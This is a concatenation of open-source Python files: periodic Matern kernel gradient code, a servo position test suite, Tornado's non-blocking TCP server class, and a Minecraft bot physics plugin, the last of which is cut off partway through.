dK_dper = mdot(dFX_dper,self.Gi,FX2.T) - mdot(FX,self.Gi,dG_dper,self.Gi,FX2.T) + mdot(FX,self.Gi,dFX2_dper.T)
self.variance.gradient = np.sum(dK_dvar*dL_dK)
self.lengthscale.gradient = np.sum(dK_dlen*dL_dK)
self.period.gradient = np.sum(dK_dper*dL_dK)
class PeriodicMatern32(Periodic):
"""
Kernel of the periodic subspace (up to a given frequency) of a Matern 3/2 RKHS. Only defined for input_dim=1.
:param input_dim: the number of input dimensions
:type input_dim: int
:param variance: the variance of the Matern kernel
:type variance: float
:param lengthscale: the lengthscale of the Matern kernel
:type lengthscale: np.ndarray of size (input_dim,)
:param period: the period
:type period: float
:param n_freq: the number of frequencies considered for the periodic subspace
:type n_freq: int
:rtype: kernel object
"""
def __init__(self, input_dim=1, variance=1., lengthscale=1., period=2.*np.pi, n_freq=10, lower=0., upper=4*np.pi, active_dims=None, name='periodic_Matern32'):
super(PeriodicMatern32, self).__init__(input_dim, variance, lengthscale, period, n_freq, lower, upper, active_dims, name)
def parameters_changed(self):
self.a = [3./self.lengthscale**2, 2*np.sqrt(3)/self.lengthscale, 1.]
self.b = [1,self.lengthscale**2/3]
self.basis_alpha = np.ones((self.n_basis,))
self.basis_omega = (2*np.pi*np.arange(1,self.n_freq+1)/self.period).repeat(2)
self.basis_phi = np.zeros(self.n_freq * 2)
self.basis_phi[::2] = -np.pi/2
self.G = self.Gram_matrix()
self.Gi = np.linalg.inv(self.G)
def Gram_matrix(self):
La = np.column_stack((self.a[0]*np.ones((self.n_basis,1)),self.a[1]*self.basis_omega,self.a[2]*self.basis_omega**2))
Lo = np.column_stack((self.basis_omega,self.basis_omega,self.basis_omega))
Lp = np.column_stack((self.basis_phi,self.basis_phi+np.pi/2,self.basis_phi+np.pi))
r,omega,phi = self._cos_factorization(La,Lo,Lp)
Gint = self._int_computation( r,omega,phi, r,omega,phi)
Flower = np.array(self._cos(self.basis_alpha,self.basis_omega,self.basis_phi)(self.lower))[:,None]
F1lower = np.array(self._cos(self.basis_alpha*self.basis_omega,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
return(self.lengthscale**3/(12*np.sqrt(3)*self.variance) * Gint + 1./self.variance*np.dot(Flower,Flower.T) + self.lengthscale**2/(3.*self.variance)*np.dot(F1lower,F1lower.T))
@silence_errors
def update_gradients_full(self,dL_dK,X,X2):
"""derivative of the covariance matrix with respect to the parameters (shape is num_data x num_inducing x num_params)"""
if X2 is None: X2 = X
FX = self._cos(self.basis_alpha[None,:],self.basis_omega[None,:],self.basis_phi[None,:])(X)
FX2 = self._cos(self.basis_alpha[None,:],self.basis_omega[None,:],self.basis_phi[None,:])(X2)
La = np.column_stack((self.a[0]*np.ones((self.n_basis,1)),self.a[1]*self.basis_omega,self.a[2]*self.basis_omega**2))
Lo = np.column_stack((self.basis_omega,self.basis_omega,self.basis_omega))
Lp = np.column_stack((self.basis_phi,self.basis_phi+np.pi/2,self.basis_phi+np.pi))
r,omega,phi = self._cos_factorization(La,Lo,Lp)
Gint = self._int_computation( r,omega,phi, r,omega,phi)
Flower = np.array(self._cos(self.basis_alpha,self.basis_omega,self.basis_phi)(self.lower))[:,None]
F1lower = np.array(self._cos(self.basis_alpha*self.basis_omega,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
dK_dvar = 1./self.variance*mdot(FX,self.Gi,FX2.T)
da_dlen = [-6/self.lengthscale**3,-2*np.sqrt(3)/self.lengthscale**2,0.]
db_dlen = [0.,2*self.lengthscale/3.]
dLa_dlen = np.column_stack((da_dlen[0]*np.ones((self.n_basis,1)),da_dlen[1]*self.basis_omega,da_dlen[2]*self.basis_omega**2))
r1,omega1,phi1 = self._cos_factorization(dLa_dlen,Lo,Lp)
dGint_dlen = self._int_computation(r1,omega1,phi1, r,omega,phi)
dGint_dlen = dGint_dlen + dGint_dlen.T
dG_dlen = self.lengthscale**2/(4*np.sqrt(3))*Gint + self.lengthscale**3/(12*np.sqrt(3))*dGint_dlen + db_dlen[0]*np.dot(Flower,Flower.T) + db_dlen[1]*np.dot(F1lower,F1lower.T)
dK_dlen = -mdot(FX,self.Gi,dG_dlen/self.variance,self.Gi,FX2.T)
dFX_dper = self._cos(-self.basis_alpha[None,:]*self.basis_omega[None,:]/self.period*X ,self.basis_omega[None,:],self.basis_phi[None,:]+np.pi/2)(X)
dFX2_dper = self._cos(-self.basis_alpha[None,:]*self.basis_omega[None,:]/self.period*X2,self.basis_omega[None,:],self.basis_phi[None,:]+np.pi/2)(X2)
dLa_dper = np.column_stack((-self.a[0]*self.basis_omega/self.period, -self.a[1]*self.basis_omega**2/self.period, -self.a[2]*self.basis_omega**3/self.period))
dLp_dper = np.column_stack((self.basis_phi+np.pi/2,self.basis_phi+np.pi,self.basis_phi+np.pi*3/2))
r1,omega1,phi1 = self._cos_factorization(dLa_dper,Lo,dLp_dper)
IPPprim1 = self.upper*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi/2) + 1./(omega-omega1.T)*np.cos((omega-omega1.T)*self.upper+phi-phi1.T-np.pi/2))
IPPprim1 -= self.lower*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi/2) + 1./(omega-omega1.T)*np.cos((omega-omega1.T)*self.lower+phi-phi1.T-np.pi/2))
IPPprim2 = self.upper*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi/2) + self.upper*np.cos(phi-phi1.T))
IPPprim2 -= self.lower*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi/2) + self.lower*np.cos(phi-phi1.T))
IPPprim = np.where(np.isnan(IPPprim1),IPPprim2,IPPprim1)
IPPint1 = 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi) + 1./(omega-omega1.T)**2*np.cos((omega-omega1.T)*self.upper+phi-phi1.T-np.pi)
IPPint1 -= 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi) + 1./(omega-omega1.T)**2*np.cos((omega-omega1.T)*self.lower+phi-phi1.T-np.pi)
IPPint2 = 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi) + 1./2*self.upper**2*np.cos(phi-phi1.T)
IPPint2 -= 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi) + 1./2*self.lower**2*np.cos(phi-phi1.T)
IPPint = np.where(np.isnan(IPPint1),IPPint2,IPPint1)
dLa_dper2 = np.column_stack((-self.a[1]*self.basis_omega/self.period, -2*self.a[2]*self.basis_omega**2/self.period))
dLp_dper2 = np.column_stack((self.basis_phi+np.pi/2,self.basis_phi+np.pi))
r2,omega2,phi2 = self._cos_factorization(dLa_dper2,Lo[:,0:2],dLp_dper2)
dGint_dper = np.dot(r,r1.T)/2 * (IPPprim - IPPint) + self._int_computation(r2,omega2,phi2, r,omega,phi)
dGint_dper = dGint_dper + dGint_dper.T
dFlower_dper = np.array(self._cos(-self.lower*self.basis_alpha*self.basis_omega/self.period,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
dF1lower_dper = np.array(self._cos(-self.lower*self.basis_alpha*self.basis_omega**2/self.period,self.basis_omega,self.basis_phi+np.pi)(self.lower)+self._cos(-self.basis_alpha*self.basis_omega/self.period,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
dG_dper = 1./self.variance*(self.lengthscale**3/(12*np.sqrt(3))*dGint_dper + self.b[0]*(np.dot(dFlower_dper,Flower.T)+np.dot(Flower,dFlower_dper.T)) + self.b[1]*(np.dot(dF1lower_dper,F1lower.T)+np.dot(F1lower,dF1lower_dper.T)))
dK_dper = mdot(dFX_dper,self.Gi,FX2.T) - mdot(FX,self.Gi,dG_dper,self.Gi,FX2.T) + mdot(FX,self.Gi,dFX2_dper.T)
self.variance.gradient = np.sum(dK_dvar*dL_dK)
self.lengthscale.gradient = np.sum(dK_dlen*dL_dK)
self.period.gradient = np.sum(dK_dper*dL_dK)
class PeriodicMatern52(Periodic):
"""
Kernel of the periodic subspace (up to a given frequency) of a Matern 5/2 RKHS. Only defined for input_dim=1.
:param input_dim: the number of input dimensions
:type input_dim: int
:param variance: the variance of the Matern kernel
:type variance: float
:param lengthscale: the lengthscale of the Matern kernel
:type lengthscale: np.ndarray of size (input_dim,)
:param period: the period
:type period: float
:param n_freq: the number of frequencies considered for the periodic subspace
:type n_freq: int
:rtype: kernel object
"""
def __init__(self, input_dim=1, variance=1., lengthscale=1., period=2.*np.pi, n_freq=10, lower=0., upper=4*np.pi, active_dims=None, name='periodic_Matern52'):
super(PeriodicMatern52, self).__init__(input_dim, variance, lengthscale, period, n_freq, lower, upper, active_dims, name)
def parameters_changed(self):
self.a = [5*np.sqrt(5)/self.lengthscale**3, 15./self.lengthscale**2,3*np.sqrt(5)/self.lengthscale, 1.]
self.b = [9./8, 9*self.lengthscale**4/200., 3*self.lengthscale**2/5., 3*self.lengthscale**2/(5*8.), 3*self.lengthscale**2/(5*8.)]
self.basis_alpha = np.ones((2*self.n_freq,))
self.basis_omega = (2*np.pi*np.arange(1,self.n_freq+1)/self.period).repeat(2)
self.basis_phi = np.zeros(self.n_freq * 2)
self.basis_phi[::2] = -np.pi/2
self.G = self.Gram_matrix()
self.Gi = np.linalg.inv(self.G)
def Gram_matrix(self):
La = np.column_stack((self.a[0]*np.ones((self.n_basis,1)), self.a[1]*self.basis_omega, self.a[2]*self.basis_omega**2, self.a[3]*self.basis_omega**3))
Lo = np.column_stack((self.basis_omega, self.basis_omega, self.basis_omega, self.basis_omega))
Lp = np.column_stack((self.basis_phi, self.basis_phi+np.pi/2, self.basis_phi+np.pi, self.basis_phi+np.pi*3/2))
r,omega,phi = self._cos_factorization(La,Lo,Lp)
Gint = self._int_computation( r,omega,phi, r,omega,phi)
Flower = np.array(self._cos(self.basis_alpha,self.basis_omega,self.basis_phi)(self.lower))[:,None]
F1lower = np.array(self._cos(self.basis_alpha*self.basis_omega,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
F2lower = np.array(self._cos(self.basis_alpha*self.basis_omega**2,self.basis_omega,self.basis_phi+np.pi)(self.lower))[:,None]
lower_terms = self.b[0]*np.dot(Flower,Flower.T) + self.b[1]*np.dot(F2lower,F2lower.T) + self.b[2]*np.dot(F1lower,F1lower.T) + self.b[3]*np.dot(F2lower,Flower.T) + self.b[4]*np.dot(Flower,F2lower.T)
return(3*self.lengthscale**5/(400*np.sqrt(5)*self.variance) * Gint + 1./self.variance*lower_terms)
@silence_errors
def update_gradients_full(self, dL_dK, X, X2=None):
if X2 is None: X2 = X
FX = self._cos(self.basis_alpha[None,:],self.basis_omega[None,:],self.basis_phi[None,:])(X)
FX2 = self._cos(self.basis_alpha[None,:],self.basis_omega[None,:],self.basis_phi[None,:])(X2)
La = np.column_stack((self.a[0]*np.ones((self.n_basis,1)), self.a[1]*self.basis_omega, self.a[2]*self.basis_omega**2, self.a[3]*self.basis_omega**3))
Lo = np.column_stack((self.basis_omega, self.basis_omega, self.basis_omega, self.basis_omega))
Lp = np.column_stack((self.basis_phi, self.basis_phi+np.pi/2, self.basis_phi+np.pi, self.basis_phi+np.pi*3/2))
r,omega,phi = self._cos_factorization(La,Lo,Lp)
Gint = self._int_computation( r,omega,phi, r,omega,phi)
Flower = np.array(self._cos(self.basis_alpha,self.basis_omega,self.basis_phi)(self.lower))[:,None]
F1lower = np.array(self._cos(self.basis_alpha*self.basis_omega,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
F2lower = np.array(self._cos(self.basis_alpha*self.basis_omega**2,self.basis_omega,self.basis_phi+np.pi)(self.lower))[:,None]
dK_dvar = 1./self.variance*mdot(FX,self.Gi,FX2.T)
da_dlen = [-3*self.a[0]/self.lengthscale, -2*self.a[1]/self.lengthscale, -self.a[2]/self.lengthscale, 0.]
db_dlen = [0., 4*self.b[1]/self.lengthscale, 2*self.b[2]/self.lengthscale, 2*self.b[3]/self.lengthscale, 2*self.b[4]/self.lengthscale]
dLa_dlen = np.column_stack((da_dlen[0]*np.ones((self.n_basis,1)), da_dlen[1]*self.basis_omega, da_dlen[2]*self.basis_omega**2, da_dlen[3]*self.basis_omega**3))
r1,omega1,phi1 = self._cos_factorization(dLa_dlen,Lo,Lp)
dGint_dlen = self._int_computation(r1,omega1,phi1, r,omega,phi)
dGint_dlen = dGint_dlen + dGint_dlen.T
dlower_terms_dlen = db_dlen[0]*np.dot(Flower,Flower.T) + db_dlen[1]*np.dot(F2lower,F2lower.T) + db_dlen[2]*np.dot(F1lower,F1lower.T) + db_dlen[3]*np.dot(F2lower,Flower.T) + db_dlen[4]*np.dot(Flower,F2lower.T)
dG_dlen = 15*self.lengthscale**4/(400*np.sqrt(5))*Gint + 3*self.lengthscale**5/(400*np.sqrt(5))*dGint_dlen + dlower_terms_dlen
dK_dlen = -mdot(FX,self.Gi,dG_dlen/self.variance,self.Gi,FX2.T)
dFX_dper = self._cos(-self.basis_alpha[None,:]*self.basis_omega[None,:]/self.period*X ,self.basis_omega[None,:],self.basis_phi[None,:]+np.pi/2)(X)
dFX2_dper = self._cos(-self.basis_alpha[None,:]*self.basis_omega[None,:]/self.period*X2,self.basis_omega[None,:],self.basis_phi[None,:]+np.pi/2)(X2)
dLa_dper = np.column_stack((-self.a[0]*self.basis_omega/self.period, -self.a[1]*self.basis_omega**2/self.period, -self.a[2]*self.basis_omega**3/self.period, -self.a[3]*self.basis_omega**4/self.period))
dLp_dper = np.column_stack((self.basis_phi+np.pi/2,self.basis_phi+np.pi,self.basis_phi+np.pi*3/2,self.basis_phi))
r1,omega1,phi1 = self._cos_factorization(dLa_dper,Lo,dLp_dper)
IPPprim1 = self.upper*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi/2) + 1./(omega-omega1.T)*np.cos((omega-omega1.T)*self.upper+phi-phi1.T-np.pi/2))
IPPprim1 -= self.lower*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi/2) + 1./(omega-omega1.T)*np.cos((omega-omega1.T)*self.lower+phi-phi1.T-np.pi/2))
IPPprim2 = self.upper*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi/2) + self.upper*np.cos(phi-phi1.T))
IPPprim2 -= self.lower*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi/2) + self.lower*np.cos(phi-phi1.T))
IPPprim = np.where(np.isnan(IPPprim1),IPPprim2,IPPprim1)
IPPint1 = 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi) + 1./(omega-omega1.T)**2*np.cos((omega-omega1.T)*self.upper+phi-phi1.T-np.pi)
IPPint1 -= 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi) + 1./(omega-omega1.T)**2*np.cos((omega-omega1.T)*self.lower+phi-phi1.T-np.pi)
IPPint2 = 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi) + 1./2*self.upper**2*np.cos(phi-phi1.T)
IPPint2 -= 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi) + 1./2*self.lower**2*np.cos(phi-phi1.T)
IPPint = np.where(np.isnan(IPPint1),IPPint2,IPPint1)
dLa_dper2 = np.column_stack((-self.a[1]*self.basis_omega/self.period, -2*self.a[2]*self.basis_omega**2/self.period, -3*self.a[3]*self.basis_omega**3/self.period))
dLp_dper2 = np.column_stack((self.basis_phi+np.pi/2, self.basis_phi+np.pi, self.basis_phi+np.pi*3/2))
r2,omega2,phi2 = self._cos_factorization(dLa_dper2,Lo[:,0:2],dLp_dper2)
dGint_dper = np.dot(r,r1.T)/2 * (IPPprim - IPPint) + self._int_computation(r2,omega2,phi2, r,omega,phi)
dGint_dper = dGint_dper + dGint_dper.T
dFlower_dper = np.array(self._cos(-self.lower*self.basis_alpha*self.basis_omega/self.period,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
dF1lower_dper = np.array(self._cos(-self.lower*self.basis_alpha*self.basis_omega**2/self.period,self.basis_omega,self.basis_phi+np.pi)(self.lower)+self._cos(-self.basis_alpha*self.basis_omega/self.period,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
dF2lower_dper = np.array(self._cos(-self.lower*self.basis_alpha*self.basis_omega**3/self.period,self.basis_omega,self.basis_phi+np.pi*3/2)(self.lower) + self._cos(-2*self.basis_alpha*self.basis_omega**2/self.period,self.basis_omega,self.basis_phi+np.pi)(self.lower))[:,None]
dlower_terms_dper = self.b[0] * (np.dot(dFlower_dper,Flower.T) + np.dot(Flower.T,dFlower_dper))
dlower_terms_dper += self.b[1] * (np.dot(dF2lower_dper,F2lower.T) + np.dot(F2lower,dF2lower_dper.T)) - 4*self.b[1]/self.period*np.dot(F2lower,F2lower.T)
dlower_terms_dper += self.b[2] * (np.dot(dF1lower_dper,F1lower.T) + np.dot(F1lower,dF1lower_dper.T)) - 2*self.b[2]/self.period*np.dot(F1lower,F1lower.T)
dlower_terms_dper += self.b[3] * (np.dot(dF2lower_dper,Flower.T) + np.dot(F2lower,dFlower_dper.T)) - 2*self.b[3]/self.period*np.dot(F2lower,Flower.T)
dlower_terms_dper += self.b[4] * (np.dot(dFlower_dper,F2lower.T) + np.dot(Flower,dF2lower_dper.T)) - 2*self.b[4]/self.period*np.dot(Flower,F2lower.T)
dG_dper = 1./self.variance*(3*self.lengthscale**5/(400*np.sqrt(5))*dGint_dper + 0.5*dlower_terms_dper)
dK_dper = mdot(dFX_dper,self.Gi,FX2.T) - mdot(FX,self.Gi,dG_dper,self.Gi,FX2.T) + mdot(FX,self.Gi,dFX2_dper.T)
self.variance.gradient = np.sum(dK_dvar*dL_dK)
self.lengthscale.gradient = np.sum(dK_dlen*dL_dK)
self.period.gradient = np.sum(dK_dper*dL_dK)
|
data/IEEERobotics/bot/tests/test_servo.py
|
"""Test cases for servo abstraction class."""
from random import randint
from os import path
import bot.lib.lib as lib
import bot.hardware.servo as s_mod
import tests.test_bot as test_bot
class TestPosition(test_bot.TestBot):
"""Test setting and checking the position of a servo."""
def setUp(self):
"""Setup test hardware files and build servo object."""
super(TestPosition, self).setUp()
config = path.dirname(path.realpath(__file__))+"/test_config.yaml"
self.config = lib.get_config(config)
self.pwm_num = self.config['test_servo']
self.setup_pwm(self.pwm_num, "1\n", "150\n", "200\n", "0\n")
self.servo = s_mod.Servo(self.pwm_num)
def tearDown(self):
"""Restore testing flag state in config file."""
super(TestPosition, self).tearDown()
def test_0(self):
"""Test setting servo position to max in zero direction."""
self.servo.position = 0
assert self.servo.position == 0, self.servo.position
def test_180(self):
"""Test setting servo position to max in 180 direction."""
self.servo.position = 180
assert self.servo.position == 180, self.servo.position
def test_middle(self):
"""Test the servo at middle position."""
self.servo.position = 90
assert self.servo.position == 90, self.servo.position
def test_series(self):
"""Test a series of positions."""
for position in range(0, 180, 18):
self.servo.position = position
assert self.servo.position == position, self.servo.position
def test_manually_confirm(self):
"""Test a series of random positions, read simulated HW to confirm."""
for i in range(10):
test_pos = randint(0, 180)
self.servo.position = test_pos
cur_pwm = self.get_pwm(self.pwm_num)
duty = int(cur_pwm["duty_ns"])
read_pos = int(round(((duty - 580000) / 2320000.) * 180))
assert read_pos == test_pos, "{} != {}".format(read_pos, test_pos)
def test_over_max(self):
"""Test position over max position. Should use maximum."""
self.servo.position = 181
assert self.servo.position == 180, \
"Actual: {}".format(self.servo.position)
def test_under_min(self):
"""Test position under minimum position. Should use minimum."""
self.servo.position = -1
assert self.servo.position == 0, \
"Actual: {}".format(self.servo.position)
|
data/RobotWebTools/rosbridge_suite/rosbridge_server/src/tornado/tcpserver.py
|
"""A non-blocking, single-threaded TCP server."""
from __future__ import absolute_import, division, print_function, with_statement
import errno
import os
import socket
from tornado.log import app_log
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream, SSLIOStream
from tornado.netutil import bind_sockets, add_accept_handler, ssl_wrap_socket
from tornado import process
from tornado.util import errno_from_exception
try:
import ssl
except ImportError:
ssl = None
class TCPServer(object):
r"""A non-blocking, single-threaded TCP server.
To use `TCPServer`, define a subclass which overrides the `handle_stream`
method.
To make this server serve SSL traffic, send the ssl_options dictionary
argument with the arguments required for the `ssl.wrap_socket` method,
including "certfile" and "keyfile"::
TCPServer(ssl_options={
"certfile": os.path.join(data_dir, "mydomain.crt"),
"keyfile": os.path.join(data_dir, "mydomain.key"),
})
`TCPServer` initialization follows one of three patterns:
1. `listen`: simple single-process::
server = TCPServer()
server.listen(8888)
IOLoop.instance().start()
2. `bind`/`start`: simple multi-process::
server = TCPServer()
server.bind(8888)
server.start(0)
IOLoop.instance().start()
When using this interface, an `.IOLoop` must *not* be passed
to the `TCPServer` constructor. `start` will always start
the server on the default singleton `.IOLoop`.
3. `add_sockets`: advanced multi-process::
sockets = bind_sockets(8888)
tornado.process.fork_processes(0)
server = TCPServer()
server.add_sockets(sockets)
IOLoop.instance().start()
The `add_sockets` interface is more complicated, but it can be
used with `tornado.process.fork_processes` to give you more
flexibility in when the fork happens. `add_sockets` can
also be used in single-process servers if you want to create
your listening sockets in some way other than
`~tornado.netutil.bind_sockets`.
.. versionadded:: 3.1
The ``max_buffer_size`` argument.
"""
def __init__(self, io_loop=None, ssl_options=None, max_buffer_size=None,
read_chunk_size=None):
self.io_loop = io_loop
self.ssl_options = ssl_options
self._sockets = {}
self._pending_sockets = []
self._started = False
self.max_buffer_size = max_buffer_size
self.read_chunk_size = None
if self.ssl_options is not None and isinstance(self.ssl_options, dict):
if 'certfile' not in self.ssl_options:
raise KeyError('missing key "certfile" in ssl_options')
if not os.path.exists(self.ssl_options['certfile']):
raise ValueError('certfile "%s" does not exist' %
self.ssl_options['certfile'])
if ('keyfile' in self.ssl_options and
not os.path.exists(self.ssl_options['keyfile'])):
raise ValueError('keyfile "%s" does not exist' %
self.ssl_options['keyfile'])
def listen(self, port, address=""):
"""Starts accepting connections on the given port.
This method may be called more than once to listen on multiple ports.
`listen` takes effect immediately; it is not necessary to call
`TCPServer.start` afterwards. It is, however, necessary to start
the `.IOLoop`.
"""
sockets = bind_sockets(port, address=address)
self.add_sockets(sockets)
def add_sockets(self, sockets):
"""Makes this server start accepting connections on the given sockets.
The ``sockets`` parameter is a list of socket objects such as
those returned by `~tornado.netutil.bind_sockets`.
`add_sockets` is typically used in combination with that
method and `tornado.process.fork_processes` to provide greater
control over the initialization of a multi-process server.
"""
if self.io_loop is None:
self.io_loop = IOLoop.current()
for sock in sockets:
self._sockets[sock.fileno()] = sock
add_accept_handler(sock, self._handle_connection,
io_loop=self.io_loop)
def add_socket(self, socket):
"""Singular version of `add_sockets`. Takes a single socket object."""
self.add_sockets([socket])
def bind(self, port, address=None, family=socket.AF_UNSPEC, backlog=128):
"""Binds this server to the given port on the given address.
To start the server, call `start`. If you want to run this server
in a single process, you can call `listen` as a shortcut to the
sequence of `bind` and `start` calls.
Address may be either an IP address or hostname. If it's a hostname,
the server will listen on all IP addresses associated with the
name. Address may be an empty string or None to listen on all
available interfaces. Family may be set to either `socket.AF_INET`
or `socket.AF_INET6` to restrict to IPv4 or IPv6 addresses, otherwise
both will be used if available.
The ``backlog`` argument has the same meaning as for
`socket.listen <socket.socket.listen>`.
This method may be called multiple times prior to `start` to listen
on multiple ports or interfaces.
"""
sockets = bind_sockets(port, address=address, family=family,
backlog=backlog)
if self._started:
self.add_sockets(sockets)
else:
self._pending_sockets.extend(sockets)
def start(self, num_processes=1):
"""Starts this server in the `.IOLoop`.
By default, we run the server in this process and do not fork any
additional child process.
If num_processes is ``None`` or <= 0, we detect the number of cores
available on this machine and fork that number of child
processes. If num_processes is given and > 1, we fork that
specific number of sub-processes.
Since we use processes and not threads, there is no shared memory
between any server code.
Note that multiple processes are not compatible with the autoreload
module (or the ``autoreload=True`` option to `tornado.web.Application`
which defaults to True when ``debug=True``).
When using multiple processes, no IOLoops can be created or
referenced until after the call to ``TCPServer.start(n)``.
"""
assert not self._started
self._started = True
if num_processes != 1:
process.fork_processes(num_processes)
sockets = self._pending_sockets
self._pending_sockets = []
self.add_sockets(sockets)
def stop(self):
"""Stops listening for new connections.
Requests currently in progress may still continue after the
server is stopped.
"""
for fd, sock in self._sockets.items():
self.io_loop.remove_handler(fd)
sock.close()
def handle_stream(self, stream, address):
"""Override to handle a new `.IOStream` from an incoming connection."""
raise NotImplementedError()
def _handle_connection(self, connection, address):
if self.ssl_options is not None:
assert ssl, "Python 2.6+ and OpenSSL required for SSL"
try:
connection = ssl_wrap_socket(connection,
self.ssl_options,
server_side=True,
do_handshake_on_connect=False)
except ssl.SSLError as err:
if err.args[0] == ssl.SSL_ERROR_EOF:
return connection.close()
else:
raise
except socket.error as err:
if errno_from_exception(err) in (errno.ECONNABORTED, errno.EINVAL):
return connection.close()
else:
raise
try:
if self.ssl_options is not None:
stream = SSLIOStream(connection, io_loop=self.io_loop,
max_buffer_size=self.max_buffer_size,
read_chunk_size=self.read_chunk_size)
else:
stream = IOStream(connection, io_loop=self.io_loop,
max_buffer_size=self.max_buffer_size,
read_chunk_size=self.read_chunk_size)
self.handle_stream(stream, address)
except Exception:
app_log.error("Error in connection callback", exc_info=True)
|
data/SpockBotMC/SpockBot/spockbot/plugins/helpers/physics.py
|
"""
A Physics module built from clean-rooming the Notchian Minecraft client
Collision detection and resolution is done by a Separating Axis Theorem
implementation for concave shapes decomposed into Axis-Aligned Bounding Boxes.
This isn't totally equivalent to vanilla behavior, but it's faster and
Close Enough^TM
AKA this file does Minecraft physics
"""
import collections
import logging
import math
from spockbot.mcdata import blocks, constants as const
from spockbot.mcdata.utils import BoundingBox
from spockbot.plugins.base import PluginBase, pl_announce
from spockbot.plugins.tools import collision
from spockbot.vector import Vector3
logger = logging.getLogger('spockbot')
FP_MAGIC = 1e-4
class PhysicsCore(object):
def __init__(self, pos, vec, abilities):
self.pos = pos
self.vec = vec
self.sprinting = False
self.move_accel = abilities.walking_speed
self.abilities = abilities
self.direction = Vector3()
def jump(self):
if self.pos.on_ground:
if self.sprinting:
ground_speed = Vector3(self.vec.x, 0, self.vec.z)
if ground_speed:
self.vec += ground_speed.norm() * const.PHY_JMP_MUL
self.vec.y = const.PHY_JMP_ABS
def walk(self):
self.sprinting = False
self.move_accel = self.abilities.walking_speed
def sprint(self):
self.sprinting = True
self.move_accel = self.abilities.walking_speed * const.PHY_SPR_MUL
def move_target(self, vector):
self.direction = vector - self.pos
self.direction.y = 0
if self.direction <= Vector3(self.vec.x, 0, self.vec.z):
return True
def move_vector(self, vector):
vector.y = 0
self.direction = vector
def move_angle(self, angle, radians=False):
angle = angle if radians else math.radians(angle)
self.direction = Vector3(math.sin(angle), 0, math.cos(angle))
@pl_announce('Physics')
class PhysicsPlugin(PluginBase):
requires = ('Event', 'ClientInfo', 'Net', 'World')
events = {
'physics_tick': 'physics_tick',
'client_tick': 'client_tick',
'client_position_update': 'skip_physics',
'client_mount': 'suspend_physics',
'client_unmount': 'resume_physics',
}
def __init__(self, ploader, settings):
super(PhysicsPlugin, self).__init__(ploader, settings)
self.vec = Vector3(0.0, 0.0, 0.0)
self.col = collision.MTVTest(
self.world, BoundingBox(const.PLAYER_WIDTH, const.PLAYER_HEIGHT)
)
self.pos = self.clientinfo.position
self.skip_tick = False
self.pc = PhysicsCore(self.pos, self.vec, self.clientinfo.abilities)
ploader.provides('Physics', self.pc)
def skip_physics(self, _=None, __=None):
self.vec.zero()
self.skip_tick = True
def suspend_physics(self, _=None, __=None):
self.vec.zero()
self.event.unreg_event_handler('physics_tick', self.physics_tick)
def resume_physics(self, _=None, __=None):
self.event.reg_event_handler('physics_tick', self.physics_tick)
def client_tick(self, name, data):
self.net.push_packet('PLAY>Player Position and Look',
self.clientinfo.position.get_dict())
def physics_tick(self, _, __):
if self.skip_tick:
self.skip_tick = False
return
self.apply_accel()
mtv = self.get_mtv()
self.apply_vector(mtv)
self.pos.on_ground = mtv.y > 0
self.vec -= Vector3(0, const.PHY_GAV_ACC, 0)
self.apply_drag()
self.pc.direction = Vector3()
def get_block_slip(self):
if self.pos.on_ground:
bpos = self.pos.floor()
return blocks.get_block(*self.world.get_block(*bpos)).slipperiness
return 1
def apply_accel(self):
if not self.pc.direction:
return
if self.pos.on_ground:
block_slip = self.get_block_slip()
accel_mod = const.BASE_GND_SLIP**3 / block_slip**3
accel = self.pc.move_accel * accel_mod * const.PHY_BASE_DRG
else:
accel = const.PHY_JMP_ACC
self.vec += self.pc.direction.norm() * accel
def apply_vector(self, mtv):
self.pos += (self.vec + mtv)
self.vec.x = 0 if mtv.x else self.vec.x
self.vec.y = 0 if mtv.y else self.vec.y
self.vec.z = 0 if mtv.z else self.vec.z
def apply_drag(self):
drag = self.get_block_slip() * const.PHY_DRG_MUL
self.vec.x *= drag
self.vec.z *= drag
self.vec.y *= const.PHY_BASE_DRG
def get_mtv(self):
pos = self.pos + self.vec
pos = collision.uncenter_position(pos, self.col.bbox)
q = collections.deque((Vector3(),))
while q:
current_vector = q.popleft()
transform_vectors = self.col.check_collision(pos, current_vector)
if not all(transform_vectors):
break
for vector in transform_vectors:
test_vec = self.vec + current_vector + vector
if test_vec.dist_sq() <= self.vec.dist_sq() + FP_MAGIC:
q.append(current_vector + vector)
else:
logger.debug('Physics failed to generate an MTV, bailing out')
self.vec.zero()
return Vector3()
possible_mtv = [current_vector]
while q:
current_vector = q.popleft()
